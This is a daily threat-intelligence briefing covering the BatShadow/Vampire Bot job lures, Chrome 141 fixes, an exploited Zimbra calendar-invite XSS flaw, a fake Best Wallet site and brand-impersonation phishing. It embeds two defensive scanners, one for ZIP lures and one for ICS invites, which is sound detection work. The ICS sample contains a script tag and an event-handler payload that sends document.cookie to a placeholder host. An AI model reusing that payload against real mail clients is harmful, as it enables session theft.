Daily Threat Briefing
Diamond Trail

Cyware Daily Threat Intelligence, October 08, 2025


BatShadow is casting a net over job seekers with fake offers laced with Vampire Bot malware. Vietnamese hackers deliver ZIPs disguised as corporate docs, tricking victims into Edge-specific downloads that unleash PowerShell payloads and remote desktop access.

Chrome 141 is slamming the door on three memory-safety flaws. High-severity bugs in Sync and Storage could let attackers execute arbitrary code, and a medium-severity out-of-bounds read in WebCodecs rounds out the set. All three are triggered by crafted web content, so a visit to a malicious page is all it takes; the fix is in the current stable build.

A slick fake Best Wallet site is reeling in crypto users with a phony Captcha security ruse. Mimicking the real app's look, it prompts wallet connections to snag private keys and seed phrases, blurring the line between legit and lethal.

Top Malware Reported in the Last 24 Hours

BatShadow uses new Vampire Bot malware

The Vietnamese threat actor group BatShadow is conducting a new campaign targeting job seekers and digital marketing professionals using social engineering tactics to distribute a Go-based malware named "Vampire Bot." Malicious files disguised as job descriptions and corporate documents are delivered via ZIP archives containing decoy PDFs and harmful LNK or executable files. Victims are tricked into opening these files, triggering an infection chain involving PowerShell scripts to download additional payloads, including remote desktop software for persistent access. The attackers exploit browser-specific behaviors, instructing victims to use Microsoft Edge to bypass security restrictions and download malicious files.
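The lure layout described above (a decoy document packed next to a Windows shortcut or executable) is something a mail gateway or SOC analyst can triage mechanically. The script below is an added example, not BatShadow tooling or anything from the original report: it builds a throwaway archive in memory that mirrors the described layout (the file names and bytes are constructed for the demo), then flags executable members, document-looking double extensions such as .pdf.lnk, and members that carry the Windows shortcut (.lnk) header regardless of what they are named.

```python
"""Triage a ZIP lure: decoy document packed alongside a .lnk or executable.
Added example, not BatShadow tooling; the archive is constructed in memory."""
import io
import zipfile

# Extensions Windows will run on double-click when shipped inside an archive.
EXECUTABLE_EXTS = {".lnk", ".exe", ".scr", ".bat", ".cmd", ".js", ".vbs", ".hta", ".ps1"}
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}

# Shell Link (.lnk) header: HeaderSize 0x4C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 (MS-SHLLINK), independent of file name.
LNK_MAGIC = bytes.fromhex("4c000000011402000000000000c000000000000046")


def split_exts(name: str) -> list[str]:
    """All extensions of a member name, lowercased: 'JD.pdf.lnk' -> ['.pdf', '.lnk']."""
    base = name.rsplit("/", 1)[-1]
    return ["." + p.lower() for p in base.split(".")[1:]]


def triage_zip(data: bytes) -> dict:
    """Classify archive members and return findings plus an overall verdict."""
    findings = {"executables": [], "double_extensions": [], "lnk_by_magic": [],
                "decoys": [], "verdict": "clean"}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:
                head = member.read(len(LNK_MAGIC))
            if head == LNK_MAGIC:
                # Content says "shortcut" even if the name says otherwise.
                findings["lnk_by_magic"].append(info.filename)
            exts = split_exts(info.filename)
            if not exts:
                continue
            last = exts[-1]
            if last in EXECUTABLE_EXTS:
                findings["executables"].append(info.filename)
                # 'Profile.pdf.lnk': a document extension hiding in front of the real one.
                if any(e in DECOY_EXTS for e in exts[:-1]):
                    findings["double_extensions"].append(info.filename)
            elif last in DECOY_EXTS:
                findings["decoys"].append(info.filename)
    if findings["executables"] or findings["lnk_by_magic"]:
        paired_with_decoy = findings["decoys"] or findings["double_extensions"]
        findings["verdict"] = "suspicious" if paired_with_decoy else "review"
    return findings


def build_sample_lure() -> bytes:
    """Constructed sample mirroring the described lure layout; not a real artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Job_Description.pdf", b"%PDF-1.4 decoy document")
        zf.writestr("Company_Profile.pdf.lnk", LNK_MAGIC + b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_zip(build_sample_lure()))
```

The magic-byte check matters more than the extension check: a shortcut renamed to .pdf still executes as a shortcut once Windows reads its header, so a filter that only looks at names misses the simplest rename.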

Fake game links spread hidden malware

Fake indie game pages impersonating legitimate platforms like itch[.]io are being used to distribute malware through social engineering tactics. Attackers send messages via compromised accounts, enticing users to download seemingly harmless game files. Upon execution, these files run hidden processes that deploy stealthy loaders, utilizing PowerShell commands and memory-only scripts to avoid detection. Users may notice unusual behavior, such as the absence of installer interfaces and the sudden appearance of new folders. This deceptive method preys on the trust within gaming communities, transforming a casual interaction into a serious security threat. The malware's design allows it to remain undetected while preparing the infected device for further malicious activities.

Top Vulnerabilities Reported in the Last 24 Hours

Google fixes critical Chrome vulnerabilities

Google has released Chrome version 141.0.7390.65/.66 to address three security vulnerabilities, two of them rated high severity. CVE-2025-11458 is a heap buffer overflow in Chrome Sync and CVE-2025-11460 is a use-after-free in the Storage component; either memory-corruption bug could allow an attacker to execute arbitrary code. The third, CVE-2025-11211, is a medium-severity out-of-bounds read in WebCodecs reported by Jakob Košir, a bug class that more commonly yields information disclosure or a crash than code execution. All three are triggered by specially crafted web content, so luring a user to a malicious page is enough to reach them; users can confirm they are on the patched build from chrome://settings/help, which also forces an update check.

CISA warns of Zimbra 0-day 

CISA has issued a warning about a zero-day cross-site scripting vulnerability in the Zimbra Collaboration Suite (ZCS), which is currently being exploited in the wild. The flaw arises from insufficient sanitization of HTML in calendar invitation files (ICS) rendered by the Classic Web Client. Attackers can craft malicious ICS entries whose embedded JavaScript executes when a user views the invitation, allowing them to hijack the user's session, steal sensitive data, and alter email filters (for example, to silently forward mail). The vulnerability has a CVSS score of 7.5, indicating high severity, and affects all supported versions of ZCS that ship the Classic Web Client.
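Because the attack rides in on an ordinary calendar invitation, mail gateways and IR teams can look for HTML and script markers inside ICS text properties before the invite reaches a web client. The script below is an added example; it is not Zimbra's fix and not the exploited payload. It unfolds RFC 5545 line continuations first (a marker split across a folded line would otherwise slip past a naive grep), splits each property at the first colon outside quotes so parameters such as ALTREP="cid:..." do not confuse the parse, and then searches the free-text properties for script tags, event handlers and javascript: URIs. The sample invitation is constructed for the demo; the patterns are generic XSS markers, not a signature for any particular exploit.

```python
"""Flag calendar invitations (ICS) carrying HTML/JavaScript in text fields.
Added example; not Zimbra code and not the real payload. Sample is constructed."""
import re

# Free-text properties that a web client may render.
TEXT_PROPS = ("DESCRIPTION", "SUMMARY", "LOCATION", "COMMENT", "X-ALT-DESC")

# Generic XSS markers; \bon[a-z]+\s*= catches handlers such as onload/ontoggle
# and will also fire on benign text like "online=", which is acceptable for triage.
SUSPICIOUS = re.compile(
    r"<\s*script|<\s*iframe|javascript\s*:|\bon[a-z]+\s*=|<\s*(?:svg|img|details|object|embed)\b",
    re.IGNORECASE,
)


def unfold_ics(text: str) -> list[str]:
    """RFC 5545 unfolding: a line starting with space or tab continues the previous one."""
    lines: list[str] = []
    for line in text.replace("\r\n", "\n").split("\n"):
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += line[1:]
        else:
            lines.append(line)
    return lines


def split_property(line: str):
    """Split 'NAME;PARAM="a:b":value' at the first colon outside double quotes."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            return line[:i], line[i + 1:]
    return None, None


def scan_ics(text: str) -> list[dict]:
    """Return one finding per text property that contains an XSS marker."""
    hits = []
    for line in unfold_ics(text):
        name_params, value = split_property(line)
        if name_params is None:
            continue
        prop = name_params.split(";", 1)[0].upper()
        if prop not in TEXT_PROPS:
            continue
        m = SUSPICIOUS.search(value)
        if m:
            hits.append({"property": prop, "marker": m.group(0), "value": value[:80]})
    return hits


# Constructed sample: a folded <script> tag in DESCRIPTION and an HTML
# alternate description with an event handler. Not a real captured invite.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\nUID:demo-1@example.invalid\r\n"
    "SUMMARY:Quarterly review\r\n"
    "DESCRIPTION;ALTREP=\"cid:part1@example.invalid\":Agenda attached <scr\r\n"
    " ipt>alert(1)</script>\r\n"
    "X-ALT-DESC;FMTTYPE=text/html:<details open ontoggle=\"fetch('https://example.invalid/'"
    "+document.cookie)\">\r\n"
    "END:VEVENT\r\nEND:VCALENDAR\r\n"
)

if __name__ == "__main__":
    for hit in scan_ics(SAMPLE_ICS):
        print(hit)
```

Unfolding before matching is the part worth keeping even if the pattern list is swapped for a proper HTML sanitizer: anything that inspects ICS line by line without rejoining continuations can be bypassed by folding the tag across two lines, which every compliant calendar client will quietly undo.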

Top Scams Reported in the Last 24 Hours

Best Wallet cryptocurrency scam

A new cryptocurrency scam is targeting users of the Best Wallet app, aiming to deceive them into connecting their wallets to a fraudulent website. This site closely resembles the legitimate Best Wallet platform and employs a Captcha to create an illusion of security. Once users interact with the site, they are prompted to connect their wallets, which can lead to the theft of private keys, seed phrases, and other sensitive information. The scammers have designed the fake site to mimic the original's branding and content, making it difficult for users to discern the difference. 

Phishing campaign impersonates Fortune 500 firms

A phishing campaign targeted job seekers in social media and marketing roles by impersonating prominent brands like Tesla, Google, Ferrari, and Red Bull through fake job applications. The attackers crafted emails from legitimate-sounding sender addresses to gain the trust of potential victims, and incorporated tailored URLs and authentic logos to create a deceptive sense of credibility. The phishing flow often led candidates to counterfeit login pages for sites such as Glassdoor and Facebook, where they were prompted to enter personal information or upload resumes. The tactic harvested login credentials and also collected additional PII from the uploaded documents for further exploitation.

Best Wallet, Zimbra Collaboration Suite, BatShadow, Vampire Bot
